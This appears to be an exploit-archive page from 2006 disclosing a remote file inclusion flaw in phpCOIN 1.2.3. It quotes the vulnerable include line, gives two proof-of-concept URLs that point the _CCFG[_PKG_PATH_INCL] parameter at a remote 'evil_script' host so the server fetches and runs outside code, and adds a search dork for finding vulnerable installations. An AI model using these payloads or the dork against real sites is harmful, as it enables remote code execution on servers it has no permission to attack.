phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability
# Published : 2006-08-24
# Author : Timq
# Previous Title : Phaos <= 0.9.2 basename() Remote Command Execution Exploit
# Next Title : MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit

phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org
##################################################################

Vulnerable: require_once include ($_CCFG['_PKG_PATH_INCL'].'redirect.php');

###################################################################

Exploit PoC:

http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
http://www.site.com/[path]/includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?

Dork: Powered By phpCOIN 1.2.3
####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,BliTz,Splinter,InTel,ErazerZ,Maggot,PunKerX,Infiltration

#####################################################################

# www.Syue.com [2006-08-24]